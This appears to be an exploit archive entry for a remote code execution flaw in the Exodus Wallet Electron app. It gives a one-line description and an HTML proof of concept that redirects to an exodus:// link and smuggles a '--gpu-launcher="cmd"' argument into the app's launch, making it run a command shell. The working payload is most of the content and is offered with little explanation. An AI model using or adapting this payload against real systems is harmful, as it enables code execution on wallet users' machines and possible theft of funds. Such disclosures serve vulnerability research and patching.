Exodus Wallet (ElectronJS Framework) Remote Code Execution

Exodus Wallet (ElectronJS Framework) suffers from a remote code execution vulnerability.


MD5 | b982f016d2e962c8afe4d2c5d3b8ef58

<!doctype html>
<script>
window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='
</script>


Related Posts

Comments